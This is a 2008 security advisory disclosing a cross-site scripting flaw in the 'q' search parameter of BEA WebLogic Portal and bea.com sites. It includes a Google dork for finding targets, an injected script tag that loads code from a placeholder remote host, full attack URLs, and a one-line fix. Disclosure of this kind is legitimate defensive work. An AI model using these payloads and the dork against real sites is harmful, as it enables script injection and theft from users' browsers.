bea-xss.txt
Posted on 03 June 2008
+============================================================================================+ + Oracle Corporation BEA WebLogic Portal & high XSS Vulnerabilities + +============================================================================================+ Author(s): Ivan Sanchez Producto: --------- BEA Systems Inc http://www.bea.com Oracle Corporation BEA WebLogic Portal (and others) Nullcode,has reported a vulnerability in BEA WebLogic Portal Domains, which can be exploited by malicious people to conduct high cross-site scripting attacks. Input passed to the "q" parameter in this function "search_g4.js" isn't properly sanitised. This can be exploited to execute remotes arbitrary script in a user's browser. The vulnerability has been reported in all domains *Bea.com, all sites are using the same function." to search some things" So..Other versions and others products(BEA-Company) may also be affected. Google Dork: ----------- site:bea.com/ You can see hundreds of sites. Function vulnerable: -------------------- GET http://www.bea.com/content/search/search_g4.js HTTP/1.1 search_g4.js ("textbox search" ,insert for example): "><script src=http://site/evil-remote-code.js></script> seconds.... Then redirect to other BEA application: --------------------------------------- Referer: http://see*.bea.com/search?q="><script src=http://site/evil-remote-code.js></script> GET http://see*.bea.com/search?q="><script src=http://site/evil-remote-code.js></script>&x=12&y=8&ie=latin1&site=all&output=xml_no_dtd&client=www&lr=lang_en&proxystylesheet=www&oe=latin1&filter=p&source=www HTTP/1.1 => HTTP/1.1 200 OK[1.922 s] seconds..... simply exploited.... Extract Internal code: 1- <form action="http://seeker.bea.com/search" method="get" class="formspace"><div class="searchSpacer3"> <label for="search"></label><input type="text" name="q" id="search" class="search" title="Enter Search Term" value="Search" onClick="this.value='';"><input type="image" src="/content/images/common/btn_arrowrt_redstr_off.gif" alt="Submit Search" width="22" height="18" border="0" onmouseover="this.src='/content/images/common/btn_arrowrt_redstr_on.gif'"onmouseout="this.src='/content/images/common/btn_arrowrt_redstr_off.gif'" style="vertical-align:bottom;"> 2- you can see URL://"the QueryStrings" Solution: --------- Edit the source code to ensure that input is properly sanitised. NULL CODE SERVICES [ www.nullcode.com.ar ] Hunting Security Bugs! +============================================================================================+ +============================================================================================+ + Oracle Corporation BEA WebLogic Portal & high XSS Vulnerabilities + +============================================================================================+
